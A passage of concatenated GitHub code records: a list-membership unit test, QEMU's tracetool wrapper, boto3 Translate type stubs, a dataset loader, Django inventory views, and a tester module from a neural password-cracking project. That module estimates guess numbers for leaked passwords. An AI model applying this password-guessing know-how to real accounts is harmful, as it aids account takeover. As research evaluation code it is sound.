whether a value is included in a list'''\nimport unittest\nfrom does_include import does_include\n\nclass TestDoesInclude(unittest.TestCase):\n '''A Class for testing whether a value is included in a list'''\n def test_five_nums(self):\n '''Test a list of five nums containing search value'''\n nums = [1, 2, 3, 4, 5]\n search_val = 3\n is_present = does_include(nums, search_val)\n self.assertTrue(is_present)\n\n def test_five_nums_num_not_present(self):\n '''Test a list of five nums not containing search value'''\n nums = [1, 2, 3, 4, 5]\n search_val = 6\n is_present = does_include(nums, search_val)\n self.assertFalse(is_present)\n\n def test_empty_list(self):\n '''Test an empty list'''\n lst = []\n search_val = 3\n is_present = does_include(lst, search_val)\n self.assertFalse(is_present)\n\n def test_none_values(self):\n '''Test a list of None values'''\n lst = [None]\n search_val = None\n is_present = does_include(lst, search_val)\n self.assertTrue(is_present)\n\n def test_empty_list_verse_none(self):\n '''Test an empty list for a None value'''\n lst = []\n search_val = None\n is_present = does_include(lst, search_val)\n self.assertFalse(is_present)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"T-monius/python-small-problems","sub_path":"easy-6/does-include/test_does_include.py","file_name":"test_does_include.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4119080822","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom input_pipeline import read_and_parse_single_leak, make_dataset\nfrom loss import get_probability \nfrom inference import ancestral_sampling\n\ndef scoring(G, n=10):\n Gs = np.sort(G)\n gy = np.cumsum(np.ones(len(Gs))) / len(Gs)\n \n scores = np.zeros(n)\n for i, guess_limit in enumerate(np.linspace(0.1, 1, n)):\n q = (gy<guess_limit).sum()\n num_guesses = Gs[q]\n scores[i] = num_guesses\n \n return scores\n\n\ndef plot_guess_number(\n G,\n guessed_limit=1.,\n guesses_limit=(10**3, 10**15),\n ax=None,\n x_lim=None,\n **plot_kargs\n ):\n if ax is None:\n fig, ax = plt.subplots(1, 1, figsize=(8, 6))\n\n Gs = np.sort(G)\n\n gss_limit = (Gs<guesses_limit[1]).sum()\n\n gy = np.cumsum(np.ones(len(Gs))) / len(Gs)\n ged_limit = (gy<guessed_limit).sum()\n\n n = min([gss_limit, ged_limit])\n\n x = Gs[:n]\n y = np.cumsum(np.ones(n) / len(Gs))\n\n ax.plot(x, y, **plot_kargs)\n\n ax.set_xscale('log')\n\n if x_lim is None:\n x_lim = x[-1]\n else:\n x_lim = max((x[-1], x_lim))\n\n margin = .04\n yticks = np.linspace(0, 1, 11)\n yticklabels = [f'{int(i*100)}%' for i in yticks]\n ax.set(\n xlabel=\"Number of Guesses (log)\",\n ylabel=\"Guessed Passwords\",\n ylim=(0, 1 + margin),\n xlim=(guesses_limit[0], x_lim),\n yticks=yticks,\n yticklabels=yticklabels,\n );\n\n ax.legend()\n return ax, x_lim\n\n\nclass Tester:\n \"\"\" Assign guess numbers and/or probabilities to passwords using Monte Carlo est. 
\"\"\"\n \n def __init__(\n self,\n encoder,\n decoder,\n input_fn,\n hparams,\n theta_file=None,\n log_probability=False\n ):\n \n self.encoder, self.decoder = encoder, decoder\n self.conditional = not self.encoder is None\n \n self.hparams = hparams.copy()\n self.thparams = hparams['testing']\n self.input_fn = input_fn\n \n if \"sample_size\" in self.thparams:\n sample_size = self.thparams[\"sample_size\"]\n self.hparams[\"sample_size\"] = sample_size\n\n self.log_probability = log_probability\n \n if theta_file is None:\n self.p_theta = None\n else:\n self.p_theta = np.load(theta_file)\n \n @staticmethod\n def _guess_number(P, theta_P, epsilon=0):\n \"\"\" REMEMBER: move to -log p\"\"\"\n\n def gnmc(pt, theta_P):\n i = np.searchsorted(theta_P, pt)\n gn = ( 1 / (theta_P[i:] * len(theta_P) + epsilon) ).sum()\n return gn\n\n n = len(P)\n G = np.zeros(n)\n for i in range(n):\n G[i] = gnmc(P[i], theta_P)\n\n return G\n \n \n def compute_seed(self, path):\n # get dataset for configuration seed\n ds_sample_for_seed = read_and_parse_single_leak(path, self.hparams, True, shuffle=True)\n \n # compute seed from partial sample\n _data_for_seed = ds_sample_for_seed.get_single_element() \n data_for_seed = self.input_fn(_data_for_seed)\n \n print(\"Actual number of users sampled for SEED computation: \", data_for_seed[0].shape[0], \"\\n\")\n \n inputs = list(data_for_seed[2:])\n \n seed = self.encoder(inputs, training=False)\n \n return seed\n \n \n def compute_probability_from_file(self, path, return_X=False):\n \n # get dataset to test\n ds_full = read_and_parse_single_leak(path, self.hparams, False, shuffle=False)\n ds_full = ds_full.apply(\n tf.data.experimental.dense_to_ragged_batch(self.thparams['decoder_batch_size'])\n )\n \n if self.conditional:\n # compute seed \n seed = self.compute_seed(path)\n else:\n seed = None\n pub_encoded = None\n\n return self.compute_probability(\n seed,\n ds_full,\n return_X=return_X\n ), seed\n \n \n def compute_probability(self, seed, ds_full, return_X=False):\n \n P = []\n \n if return_X:\n X = []\n \n for _batch in ds_full:\n \n batch = self.input_fn(_batch)\n x, y, *_ = batch\n \n if self.conditional:\n seeds = tf.tile(seed, (x.shape[0], 1, 1))\n logits, *_ = self.decoder((x, seeds), training=False)\n else: \n logits, _ = self.decoder(x, training=False)\n\n _P = get_probability(y, logits, log_probability=self.log_probability)\n P.append(_P.numpy())\n\n if return_X:\n X += [s.decode() for s in _batch['password'].numpy()]\n \n P = np.concatenate(P)\n \n if return_X:\n return X, P\n else:\n return P\n \n \n def compute_and_save_theta_for_mc(self, seed):\n print(f\"Sampling theta for Monte Carlo guess number estimation (it might take a while....) 
Theta size is {self.thparams['theta_size']}\")\n _, p_theta = ancestral_sampling(\n self.thparams['theta_size'],\n self.decoder,\n self.thparams['decoder_batch_size'],\n self.hparams,\n seed=seed,\n with_string=False\n )\n p_theta.sort()\n return p_theta\n \n \n def compute_guess_numbers_from_file(self, path):\n\n (X, P), seed = self.compute_probability_from_file(path, return_X=True)\n\n if self.p_theta is None:\n print(\"No precomputed theta.\")\n self.p_theta = self.compute_and_save_theta_for_mc(seed)\n\n G = self._guess_number(P, self.p_theta)\n\n return X, G, P, seed","repo_name":"TheAdamProject/UniversalNeuralCrackingMachines","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"72642973066","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCommand-line wrapper for the tracetool machinery.\n\"\"\"\n\n__author__ = \"Lluís Vilanova <vilanova@ac.upc.edu>\"\n__copyright__ = \"Copyright 2012-2014, Lluís Vilanova <vilanova@ac.upc.edu>\"\n__license__ = \"GPL version 2 or (at your option) any later version\"\n\n__maintainer__ = \"Stefan Hajnoczi\"\n__email__ = \"stefanha@redhat.com\"\n\n\nimport sys\nimport getopt\n\nfrom tracetool import error_write, out, out_open\nimport tracetool.backend\nimport tracetool.format\n\n\n_SCRIPT = \"\"\n\ndef error_opt(msg = None):\n if msg is not None:\n error_write(\"Error: \" + msg + \"\\n\")\n\n backend_descr = \"\\n\".join([ \" %-15s %s\" % (n, d)\n for n,d in tracetool.backend.get_list() ])\n format_descr = \"\\n\".join([ \" %-15s %s\" % (n, d)\n for n,d in tracetool.format.get_list() ])\n error_write(\"\"\"\\\nUsage: %(script)s --format=<format> --backends=<backends> [<options>] <trace-events> ... 
<output>\n\nBackends:\n%(backends)s\n\nFormats:\n%(formats)s\n\nOptions:\n --help This help message.\n --list-backends Print list of available backends.\n --check-backends Check if the given backend is valid.\n --binary <path> Full path to QEMU binary.\n --target-type <type> QEMU emulator target type ('system' or 'user').\n --target-name <name> QEMU emulator target name.\n --group <name> Name of the event group\n --probe-prefix <prefix> Prefix for dtrace probe names\n (default: qemu-<target-type>-<target-name>).\\\n\"\"\" % {\n \"script\" : _SCRIPT,\n \"backends\" : backend_descr,\n \"formats\" : format_descr,\n })\n\n if msg is None:\n sys.exit(0)\n else:\n sys.exit(1)\n\ndef main(args):\n global _SCRIPT\n _SCRIPT = args[0]\n\n long_opts = [\"backends=\", \"format=\", \"help\", \"list-backends\",\n \"check-backends\", \"group=\"]\n long_opts += [\"binary=\", \"target-type=\", \"target-name=\", \"probe-prefix=\"]\n\n try:\n opts, args = getopt.getopt(args[1:], \"\", long_opts)\n except getopt.GetoptError as err:\n error_opt(str(err))\n\n check_backends = False\n arg_backends = []\n arg_format = \"\"\n arg_group = None\n binary = None\n target_type = None\n target_name = None\n probe_prefix = None\n for opt, arg in opts:\n if opt == \"--help\":\n error_opt()\n\n elif opt == \"--backends\":\n arg_backends = arg.split(\",\")\n elif opt == \"--group\":\n arg_group = arg\n elif opt == \"--format\":\n arg_format = arg\n\n elif opt == \"--list-backends\":\n public_backends = tracetool.backend.get_list(only_public = True)\n out(\", \".join([ b for b,_ in public_backends ]))\n sys.exit(0)\n elif opt == \"--check-backends\":\n check_backends = True\n\n elif opt == \"--binary\":\n binary = arg\n elif opt == '--target-type':\n target_type = arg\n elif opt == '--target-name':\n target_name = arg\n elif opt == '--probe-prefix':\n probe_prefix = arg\n\n else:\n error_opt(\"unhandled option: %s\" % opt)\n\n if len(arg_backends) == 0:\n error_opt(\"no backends specified\")\n\n if check_backends:\n for backend in arg_backends:\n if not tracetool.backend.exists(backend):\n sys.exit(1)\n sys.exit(0)\n\n if arg_group is None:\n error_opt(\"group name is required\")\n\n if arg_format == \"stap\":\n if binary is None:\n error_opt(\"--binary is required for SystemTAP tapset generator\")\n if probe_prefix is None and target_type is None:\n error_opt(\"--target-type is required for SystemTAP tapset generator\")\n if probe_prefix is None and target_name is None:\n error_opt(\"--target-name is required for SystemTAP tapset generator\")\n\n if probe_prefix is None:\n probe_prefix = \".\".join([\"qemu\", target_type, target_name])\n\n if len(args) < 2:\n error_opt(\"missing trace-events and output filepaths\")\n events = []\n for arg in args[:-1]:\n with open(arg, \"r\") as fh:\n events.extend(tracetool.read_events(fh, arg))\n\n out_open(args[-1])\n\n try:\n tracetool.generate(events, arg_group, arg_format, arg_backends,\n binary=binary, probe_prefix=probe_prefix)\n except tracetool.TracetoolError as e:\n error_opt(str(e))\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"qemu/qemu","sub_path":"scripts/tracetool.py","file_name":"tracetool.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":8597,"dataset":"github-code","pt":"81"} +{"seq_id":"31238668122","text":"import os\n\nfrom engine.datasets.benchmark import read_and_split_data, read_split, Benchmark\n\n\nclass DescribableTextures(Benchmark):\n\n dataset_name = \"dtd\"\n\n def __init__(self, 
data_dir):\n root = data_dir\n self.dataset_dir = os.path.join(root, self.dataset_name)\n self.image_dir = os.path.join(self.dataset_dir, \"images\")\n self.split_path = os.path.join(self.dataset_dir, \"split_zhou_DescribableTextures.json\")\n \n assert os.path.exists(self.split_path)\n train, val, test = read_split(self.split_path, self.image_dir)\n # # Uncomment the following lines to generate a new split\n # train, val, test = read_and_split_data(self.image_dir)\n # save_split(train, val, test, self.split_path, self.image_dir)\n\n super().__init__(train=train, val=val, test=test)","repo_name":"linzhiqiu/cross_modal_adaptation","sub_path":"engine/datasets/dtd.py","file_name":"dtd.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"81"} +{"seq_id":"10326917559","text":"\"\"\"\nType annotations for translate service client.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html)\n\nUsage::\n\n ```python\n import boto3\n from mypy_boto3_translate import TranslateClient\n\n client: TranslateClient = boto3.client(\"translate\")\n ```\n\"\"\"\nimport sys\nfrom typing import Any, Dict, List, Type\n\nfrom botocore.client import BaseClient, ClientMeta\n\nfrom .literals import DisplayLanguageCodeType, TerminologyDataFormatType\nfrom .paginator import ListTerminologiesPaginator\nfrom .type_defs import (\n CreateParallelDataResponseTypeDef,\n DeleteParallelDataResponseTypeDef,\n DescribeTextTranslationJobResponseTypeDef,\n EncryptionKeyTypeDef,\n GetParallelDataResponseTypeDef,\n GetTerminologyResponseTypeDef,\n ImportTerminologyResponseTypeDef,\n InputDataConfigTypeDef,\n ListLanguagesResponseTypeDef,\n ListParallelDataResponseTypeDef,\n ListTagsForResourceResponseTypeDef,\n ListTerminologiesResponseTypeDef,\n ListTextTranslationJobsResponseTypeDef,\n OutputDataConfigTypeDef,\n ParallelDataConfigTypeDef,\n StartTextTranslationJobResponseTypeDef,\n StopTextTranslationJobResponseTypeDef,\n TagTypeDef,\n TerminologyDataTypeDef,\n TextTranslationJobFilterTypeDef,\n TranslateTextResponseTypeDef,\n TranslationSettingsTypeDef,\n UpdateParallelDataResponseTypeDef,\n)\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\"TranslateClient\",)\n\nclass BotocoreClientError(BaseException):\n MSG_TEMPLATE: str\n\n def __init__(self, error_response: Dict[str, Any], operation_name: str) -> None:\n self.response: Dict[str, Any]\n self.operation_name: str\n\nclass Exceptions:\n ClientError: Type[BotocoreClientError]\n ConcurrentModificationException: Type[BotocoreClientError]\n ConflictException: Type[BotocoreClientError]\n DetectedLanguageLowConfidenceException: Type[BotocoreClientError]\n InternalServerException: Type[BotocoreClientError]\n InvalidFilterException: Type[BotocoreClientError]\n InvalidParameterValueException: Type[BotocoreClientError]\n InvalidRequestException: Type[BotocoreClientError]\n LimitExceededException: Type[BotocoreClientError]\n ResourceNotFoundException: Type[BotocoreClientError]\n ServiceUnavailableException: Type[BotocoreClientError]\n TextSizeLimitExceededException: Type[BotocoreClientError]\n TooManyRequestsException: Type[BotocoreClientError]\n TooManyTagsException: Type[BotocoreClientError]\n UnsupportedDisplayLanguageCodeException: Type[BotocoreClientError]\n UnsupportedLanguagePairException: Type[BotocoreClientError]\n\nclass TranslateClient(BaseClient):\n \"\"\"\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html)\n \"\"\"\n\n meta: ClientMeta\n\n @property\n def exceptions(self) -> Exceptions:\n \"\"\"\n TranslateClient exceptions.\n \"\"\"\n def can_paginate(self, operation_name: str) -> bool:\n \"\"\"\n Check if an operation can be paginated.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.can_paginate)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#can_paginate)\n \"\"\"\n def close(self) -> None:\n \"\"\"\n Closes underlying endpoint connections.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.close)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#close)\n \"\"\"\n def create_parallel_data(\n self,\n *,\n Name: str,\n ParallelDataConfig: \"ParallelDataConfigTypeDef\",\n ClientToken: str,\n Description: str = None,\n EncryptionKey: \"EncryptionKeyTypeDef\" = None,\n Tags: List[\"TagTypeDef\"] = None\n ) -> CreateParallelDataResponseTypeDef:\n \"\"\"\n Creates a parallel data resource in Amazon Translate by importing an input file\n from Amazon S3.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.create_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#create_parallel_data)\n \"\"\"\n def delete_parallel_data(self, *, Name: str) -> DeleteParallelDataResponseTypeDef:\n \"\"\"\n Deletes a parallel data resource in Amazon Translate.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.delete_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#delete_parallel_data)\n \"\"\"\n def delete_terminology(self, *, Name: str) -> None:\n \"\"\"\n A synchronous action that deletes a custom terminology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.delete_terminology)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#delete_terminology)\n \"\"\"\n def describe_text_translation_job(\n self, *, JobId: str\n ) -> DescribeTextTranslationJobResponseTypeDef:\n \"\"\"\n Gets the properties associated with an asynchronous batch translation job\n including name, ID, status, source and target languages, input/output S3\n buckets, and so on.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.describe_text_translation_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#describe_text_translation_job)\n \"\"\"\n def generate_presigned_url(\n self,\n ClientMethod: str,\n Params: Dict[str, Any] = None,\n ExpiresIn: int = 3600,\n HttpMethod: str = None,\n ) -> str:\n \"\"\"\n Generate a presigned url given a client, its method, and arguments.\n\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.generate_presigned_url)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#generate_presigned_url)\n \"\"\"\n def get_parallel_data(self, *, Name: str) -> GetParallelDataResponseTypeDef:\n \"\"\"\n Provides information about a parallel data resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.get_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#get_parallel_data)\n \"\"\"\n def get_terminology(\n self, *, Name: str, TerminologyDataFormat: TerminologyDataFormatType = None\n ) -> GetTerminologyResponseTypeDef:\n \"\"\"\n Retrieves a custom terminology.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.get_terminology)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#get_terminology)\n \"\"\"\n def import_terminology(\n self,\n *,\n Name: str,\n MergeStrategy: Literal[\"OVERWRITE\"],\n TerminologyData: \"TerminologyDataTypeDef\",\n Description: str = None,\n EncryptionKey: \"EncryptionKeyTypeDef\" = None,\n Tags: List[\"TagTypeDef\"] = None\n ) -> ImportTerminologyResponseTypeDef:\n \"\"\"\n Creates or updates a custom terminology, depending on whether one already exists\n for the given terminology name.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.import_terminology)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#import_terminology)\n \"\"\"\n def list_languages(\n self,\n *,\n DisplayLanguageCode: DisplayLanguageCodeType = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListLanguagesResponseTypeDef:\n \"\"\"\n Provides a list of languages (RFC-5646 codes and names) that Amazon Translate\n supports.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_languages)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_languages)\n \"\"\"\n def list_parallel_data(\n self, *, NextToken: str = None, MaxResults: int = None\n ) -> ListParallelDataResponseTypeDef:\n \"\"\"\n Provides a list of your parallel data resources in Amazon Translate.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_parallel_data)\n \"\"\"\n def list_tags_for_resource(self, *, ResourceArn: str) -> ListTagsForResourceResponseTypeDef:\n \"\"\"\n Lists all tags associated with a given Amazon Translate resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_tags_for_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_tags_for_resource)\n \"\"\"\n def list_terminologies(\n self, *, NextToken: str = None, MaxResults: int = None\n ) 
-> ListTerminologiesResponseTypeDef:\n \"\"\"\n Provides a list of custom terminologies associated with your account.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_terminologies)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_terminologies)\n \"\"\"\n def list_text_translation_jobs(\n self,\n *,\n Filter: \"TextTranslationJobFilterTypeDef\" = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListTextTranslationJobsResponseTypeDef:\n \"\"\"\n Gets a list of the batch translation jobs that you have submitted.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.list_text_translation_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#list_text_translation_jobs)\n \"\"\"\n def start_text_translation_job(\n self,\n *,\n InputDataConfig: \"InputDataConfigTypeDef\",\n OutputDataConfig: \"OutputDataConfigTypeDef\",\n DataAccessRoleArn: str,\n SourceLanguageCode: str,\n TargetLanguageCodes: List[str],\n ClientToken: str,\n JobName: str = None,\n TerminologyNames: List[str] = None,\n ParallelDataNames: List[str] = None,\n Settings: \"TranslationSettingsTypeDef\" = None\n ) -> StartTextTranslationJobResponseTypeDef:\n \"\"\"\n Starts an asynchronous batch translation job.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.start_text_translation_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#start_text_translation_job)\n \"\"\"\n def stop_text_translation_job(self, *, JobId: str) -> StopTextTranslationJobResponseTypeDef:\n \"\"\"\n Stops an asynchronous batch translation job that is in progress.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.stop_text_translation_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#stop_text_translation_job)\n \"\"\"\n def tag_resource(self, *, ResourceArn: str, Tags: List[\"TagTypeDef\"]) -> Dict[str, Any]:\n \"\"\"\n Associates a specific tag with a resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.tag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#tag_resource)\n \"\"\"\n def translate_text(\n self,\n *,\n Text: str,\n SourceLanguageCode: str,\n TargetLanguageCode: str,\n TerminologyNames: List[str] = None,\n Settings: \"TranslationSettingsTypeDef\" = None\n ) -> TranslateTextResponseTypeDef:\n \"\"\"\n Translates input text from the source language to the target language.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.translate_text)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#translate_text)\n \"\"\"\n def untag_resource(self, *, ResourceArn: str, TagKeys: List[str]) -> Dict[str, Any]:\n \"\"\"\n Removes a specific tag associated with an Amazon Translate resource.\n\n [Show boto3 
documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.untag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#untag_resource)\n \"\"\"\n def update_parallel_data(\n self,\n *,\n Name: str,\n ParallelDataConfig: \"ParallelDataConfigTypeDef\",\n ClientToken: str,\n Description: str = None\n ) -> UpdateParallelDataResponseTypeDef:\n \"\"\"\n Updates a previously created parallel data resource by importing a new input\n file from Amazon S3.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Client.update_parallel_data)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/client.html#update_parallel_data)\n \"\"\"\n def get_paginator(\n self, operation_name: Literal[\"list_terminologies\"]\n ) -> ListTerminologiesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.121/reference/services/translate.html#Translate.Paginator.ListTerminologies)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_translate/paginators.html#listterminologiespaginator)\n \"\"\"\n","repo_name":"chrishollinworth/vscode-boto3-intellisense","sub_path":"typings/mypy_boto3/translate/client.pyi","file_name":"client.pyi","file_ext":"pyi","file_size_in_byte":15632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27488305265","text":"from . import forms\nfrom .forms import ProductForm, ClientForm, LivraisonForm, TransporteurForm , Niveau1Form, Niveau2Form, Niveau3Form, Niveau4Form, Niveau5Form\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.views.decorators.cache import cache_control \nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, HttpResponse, FileResponse, JsonResponse\nfrom django.core.paginator import Paginator\nfrom django.db.models import Count, Sum\nfrom stock.models import *\nfrom escpos.printer import Usb\nfrom django.db import transaction, models\nfrom django.utils import timezone\nimport uuid\nimport csv\nimport openpyxl\nimport datetime\nfrom datetime import date\nfrom django.views.generic import View\n\n\n\n\n\n@login_required\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef index(request):\n #recupérez les date selectionnées depuis le template\n date_depart = request.GET.get('date_depart')\n date_arrive = request.GET.get('date_arrive')\n #Verifie si les dates ont été bien récupéré\n if date_depart and date_arrive:\n #on fait le filtre\n etats1 = Commande.objects.filter(date_commande__range=[date_depart, date_arrive]).values('client__rasion_sociale').annotate(total=Count('client'))\n etats = LigneCommande.objects.filter(commande__in=Commande.objects.all(), commande__date_commande__range=[date_depart, date_arrive]).values('article__code').annotate(total=Count('article'), quantite=Sum('quantite'))\n else:\n # si non retourne les éléments sans filtre\n etats1 = Commande.objects.all().values('client__rasion_sociale').annotate(total=Count('client'))\n etats = LigneCommande.objects.filter(commande__in=Commande.objects.all()).values('article__code').annotate(total=Count('article'), quantite=Sum('quantite'))\n # on compte le nombre de ligne retournées 
pour dynamiser le graphique\n barres = etats.count()\n barres1 = etats1.count()\n # on selectionne et on compte le nombre de produit disponible dans la base\n articles = Product.objects.all().count()\n # on selectionne et on compte le nombre de commande passées disponible dans la base\n articles_commandes = Commande.objects.all().count()\n # on selectionne et on compte le nombre de commande livré disponible dans la base\n articles_livres = Livraison.objects.filter(livre=True).count()\n context={\"date_depart\":date_depart, \"date_arrive\":date_arrive, \"barres1\":barres1, \"etats1\":etats1, \"barres\":barres, \"etats\":etats, \"articles\":articles, \"articles_commandes\":articles_commandes, \"articles_livres\":articles_livres}\n # on reinitialise le filtre\n if 'reset' in request.GET:\n return redirect('index')\n return render(request, 'stock/index.html', context)\n\n\n\n@login_required\n@permission_required('stock.view_client')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef client(request):\n clients = Client.objects.all().order_by('-id')\n paginator = Paginator(clients, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/client.html', context) \n\n\n@login_required\n@permission_required('stock.add_client', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef add_client(request):\n if request.method == 'POST':\n form = ClientForm(request.POST)\n if form.is_valid():\n form.save()\n cont_type1 = form.cleaned_data.get('rasion_sociale')\n cont_type2 = form.cleaned_data.get('rasion_sociale')\n messages.success(request, f\"{cont_type1}, {cont_type2} ajouté avec succès!\")\n return HttpResponseRedirect('client')\n else:\n messages.error(request, \"Veuillez verifiez svpla saisie!\")\n return render(request, 'stock/add_client.html', {'form':form})\n else:\n form = ClientForm()\n return render(request, 'stock/add_client.html', {'form':form})\n\n\n@login_required\n@permission_required('stock.change_client', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef edit_client(request, id):\n client = Client.objects.get(id=id)\n if request.method == 'POST':\n form = ClientForm(request.POST,request.FILES, instance=client)\n if form.is_valid():\n form.save(id)\n messages.success(request, f\"Mise à jour {client.rasion_sociale} ok !\")\n return redirect('client')\n else:\n form = ClientForm(instance=client)\n return render(request, 'stock/edit_client.html', {'form':form, \"client\":client})\n\n\n\n@login_required\n@permission_required('stock.delete_client', login_url='acces_denied')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef delete_client(request, id):\n client = Client.objects.get(id=id)\n if request.method=='POST':\n client.delete()\n messages.success(request, f'{client.rasion_sociale} supprimé !')\n return redirect(\"client\")\n return render(request, 'stock/delete_client.html', {\"client\":client})\n\n@login_required\n@permission_required('stock.view_transporteur')\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef transport(request):\n transports = Transporteur.objects.all().order_by('-id')\n paginator = Paginator(transports, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context={\"page_obj\":page_obj}\n return render(request, 'stock/transport.html', context) 
